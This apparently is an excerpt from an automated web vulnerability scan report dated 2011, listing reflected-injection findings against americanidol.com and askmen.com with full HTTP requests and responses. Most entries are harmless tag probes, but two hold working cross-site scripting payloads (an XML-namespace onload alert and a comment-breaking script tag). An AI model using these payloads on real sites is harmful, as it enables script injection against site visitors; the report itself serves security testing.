Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:07 GMT
Content-Length: 16412
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1]]>
...[SNIP]...

1.117. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4217<a>ba34a50088c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:13:09 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.118. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19773<a>f6cff111e75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:10 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.119. http://www.americanidol.com/videos/hot/qty/12 [dfpzone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12

Issue detail

The value of the dfpzone request parameter is copied into the XML document as plain text between tags. The payload 2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 was submitted in the dfpzone parameter. This input was echoed as 2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172796
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 19200
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[{"rating":"4.8","totalvotes":"11","dfpzone":"idol_home2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615","video_slug":"who_is_most_likely_tweet","itunes_url":"","season":"10","fallbackID":"74091","playlist_slug":"idols_live_tour","playlist_season":"10","playlist_title":"Idols Live Tour"}]]>
...[SNIP]...

1.120. http://www.americanidol.com/videos/hot/qty/12 [feed parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload f13a1<a>a7ef02b2c8e was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:02 GMT
Content-Length: 18048
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home]]>
...[SNIP]...

1.121. http://www.americanidol.com/videos/hot/qty/12 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5d505<a>8940690ae14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:06 GMT
Content-Length: 18051
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1]]>
...[SNIP]...

1.122. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f834c<a>d03fcb067cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172775
Date: Tue, 04 Oct 2011 20:07:13 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1]]>
...[SNIP]...

1.123. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cb92<a>dde1bcc21a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172782
Date: Tue, 04 Oct 2011 20:07:17 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1]]>
...[SNIP]...

1.124. http://www.americanidol.com/videos/hot/qty/12/ [feed parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 3d9af<a>8a041e21996 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=13d9af<a>8a041e21996 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:06:09 GMT
Content-Length: 18031
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=13d9af<a>8a041e21996]]>
...[SNIP]...

1.125. http://www.americanidol.com/videos/hot/qty/12/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/videos/hot/qty/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6441<a>9e35cfbb954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:06:43 GMT
Content-Length: 18034
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1]]>
...[SNIP]...

1.126. http://www.askmen.com/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6036--><script>alert(1)</script>748fd2d4c5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /apie6036--><script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762?_=1317758821320 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; rsi_segs=; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; show_snazzy_title2=2

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38712
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:02 GMT
Connection: close
Vary: Accept-Encoding

